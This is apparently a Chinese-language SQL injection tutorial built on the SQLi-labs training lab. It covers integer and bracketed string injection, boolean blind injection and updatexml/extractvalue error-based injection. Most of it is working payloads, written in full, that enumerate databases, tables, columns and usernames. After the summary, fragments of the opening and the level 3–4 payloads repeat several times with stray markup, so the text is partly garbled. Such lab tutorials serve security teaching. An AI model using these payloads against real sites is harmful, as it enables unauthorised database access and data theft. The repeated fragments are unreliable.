SQL注入进阶学习文档<\/h1>

一、SQL注入环境与基础<\/h2>
本教学基于SQLi-labs实验环境，延续第一篇基础教程内容，重点讲解多种SQL注入技术的实战应用。<\/p>

二、第二关：整型注入<\/h2>

验证方法<\/h3>

输入正常查询：?id=1<\/code> → 页面正常显示<\/li>
尝试字符注入：?id=1'--+<\/code> → 语法错误<\/li>
去掉引号：?id=1--+<\/code> → 页面正常<\/li> <\/ol> 结论<\/strong>：确认是整型注入，无需闭合引号，后续步骤与第一关相同。<\/p> 三、第三关：带括号的字符注入<\/h2> 特征分析<\/h3> 输入?id=2'<\/code>返回错误信息显示存在小括号<\/li> 源代码确认：$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";<\/code><\/li> <\/ul> 绕过方法<\/h3> 构造闭合括号并注释后续内容： ?id=2')--+<\/code><\/p> 四、第四关：双引号与括号组合注入<\/h2> 特征分析<\/h3> 输入?id=4"<\/code>返回错误显示双引号和小括号<\/li> 类似第三关但使用双引号<\/li> <\/ul> 绕过方法<\/h3> 构造闭合双引号和括号： ?id=4")--+<\/code><\/p> 五、第五关：布尔盲注与报错注入<\/h2> 1. 布尔盲注技术<\/h3> 确认注入类型<\/h4> ?id=1'<\/code> → 报错显示两个单引号 → 字符注入<\/li> ?id=1'--+<\/code> → 页面正常<\/li> ?id=1' union select 1,2,3--+<\/code> → 无数据回显<\/li> <\/ol> 布尔盲注验证<\/h4> ?id=1' and 1=1 --+<\/code> → 显示"You are in ......"<\/li> ?id=1' and 1=2 --+<\/code> → 无显示<\/li> <\/ul> 关键函数<\/h4> length()<\/code>: 确定字符串长度<\/li> ascii()<\/code>: 字符转ASCII码<\/li> substr()<\/code>: 截取字符串<\/li> <\/ul> 数据库名猜测<\/h4> 确定长度：<\/p> ?id=1' and length((select database()))>7--+<\/code> → 成功<\/li> ?id=1' and length((select database()))>8--+<\/code> → 失败 → 长度=8<\/li> <\/ul> <\/li> 逐字符猜测：<\/p> ?id=1' and ascii(substr(database(),1,1))=115--+<\/code> → 第一个字符's'<\/li> ?id=1' and ascii(substr(database(),2,1))=101--+<\/code> → 第二个字符'e'<\/li> 最终确定数据库名：security<\/li> <\/ul> <\/li> <\/ol> 表信息获取<\/h4> 表数量： ?id=1' and (select count(table_name) from information_schema.tables where table_schema='security')=4--+<\/code><\/p> <\/li> 表长度：<\/p> ?id=1' and length((select table_name from information_schema.tables where table_schema='security' limit 0,1))=6--+<\/code><\/li> ?id=1' and length((select table_name from information_schema.tables where table_schema='security' limit 1,1))=8--+<\/code><\/li> ?id=1' and length((select table_name from information_schema.tables where table_schema='security' limit 2,1))=7--+<\/code><\/li> ?id=1' and length((select table_name from information_schema.tables where table_schema='security' limit 3,1))=5--+<\/code><\/li> <\/ul> <\/li> 表名猜测： ?id=1' and substr((select table_name from information_schema.tables where table_schema='security' limit 3,1),1,1)='u'--+<\/code><\/p> <\/li> 字段数量： ?id=1' and (select count(column_name) from information_schema.columns where table_schema='security' and table_name='users')=3--+<\/code><\/p> <\/li> <\/ol> 2. 报错注入技术<\/h3> updatexml函数<\/h4> 原型：updatexml(xml_data, xpath表达式, 新值)<\/code><\/li> 报错注入原理：利用xpath表达式错误返回信息<\/li> <\/ul> 使用方法<\/h5> 获取数据库名： ?id=1' and updatexml(1,concat(0x7e,database(),0x7e),1)--+<\/code><\/p> <\/li> 获取表名：<\/p> ?id=1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 0,1),0x7e),1)--+<\/code><\/li> ?id=1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 1,1),0x7e),1)--+<\/code><\/li> <\/ul> <\/li> 获取字段名： ?id=1' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),0x7e),1)--+<\/code><\/p> <\/li> 获取数据： ?id=1' and updatexml(1,concat(0x7e,(select group_concat(username) from users),0x7e),1)--+<\/code><\/p> <\/li> <\/ol> 注意<\/strong>：updatexml报错信息限制64字符，使用concat(0x7e,...)<\/code>确保信息完整<\/p> extractvalue函数<\/h4> 原型：extractvalue(xml_data, xpath表达式)<\/code><\/li> 使用方法类似updatexml<\/li> <\/ul> 示例<\/h5> 获取数据库名： ?id=1' and extractvalue(1, concat(0x7e,database(),0x7e))--+<\/code><\/p> <\/li> 获取表名： ?id=1' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e))--+<\/code><\/p> <\/li> <\/ol> 六、技术补充<\/h2> updatexml函数详解<\/h3> 正常用途<\/strong>：更新XML格式数据<\/p> UPDATE<\/span> user_xml SET<\/span> xml_data =<\/span> UPDATEXML( <\/span><\/span> xml_data, -- 字段名 <\/span><\/span><\/span><\/span> '\/user\/name'<\/span>, -- xpath表达式 <\/span><\/span><\/span><\/span> '张三丰'<\/span> -- 新值 <\/span><\/span><\/span><\/span>) WHERE<\/span> id =<\/span> 1<\/span>; <\/span><\/span><\/code><\/pre><\/li> 报错注入技巧<\/strong>：<\/p> 参数1和3设为1作为占位符<\/li> 参数2构造非法xpath表达式触发错误<\/li> 使用0x7e<\/code>(~)确保信息完整显示<\/li> <\/ul> <\/li> <\/ul> 七、总结<\/h2> 本教程详细介绍了：<\/p> 整型与字符型注入的识别方法<\/li> 带括号注入的特殊处理技巧<\/li> 布尔盲注的完整流程与函数使用<\/li> 报错注入的两种实现方式(updatexml\/extractvalue)<\/li> 各种注入技术的实际应用示例<\/li> <\/ol> 关键点在于理解不同注入场景的特征，掌握信息获取的多种方法，并能根据实际情况选择最合适的注入技术。<\/p>

SQL注入进阶学习文档<\/h1>

一、SQL注入环境与基础<\/h2>
本教学基于SQLi-labs实验环境，延续第一篇基础教程内容，重点讲解多种SQL注入技术的实战应用。<\/p>

二、第二关：整型注入<\/h2>

绕过方法<\/h3>
构造闭合括号并注释后续内容：
`?id=2')--+<\/code><\/p>`

绕过方法<\/h3>
构造闭合双引号和括号：
`?id=4")--+<\/code><\/p>`

1. 布尔盲注技术<\/h3>

SQL注入进阶学习文档<\/h1>

一、SQL注入环境与基础<\/h2> 本教学基于SQLi-labs实验环境，延续第一篇基础教程内容，重点讲解多种SQL注入技术的实战应用。<\/p>

二、第二关：整型注入<\/h2>

绕过方法<\/h3> 构造闭合括号并注释后续内容： ?id=2')--+<\/code><\/p>

绕过方法<\/h3> 构造闭合双引号和括号： ?id=4")--+<\/code><\/p>

1. 布尔盲注技术<\/h3>

一、SQL注入环境与基础<\/h2>
本教学基于SQLi-labs实验环境，延续第一篇基础教程内容，重点讲解多种SQL注入技术的实战应用。<\/p>

绕过方法<\/h3>
构造闭合括号并注释后续内容：
`?id=2')--+<\/code><\/p>`

绕过方法<\/h3>
构造闭合双引号和括号：
`?id=4")--+<\/code><\/p>`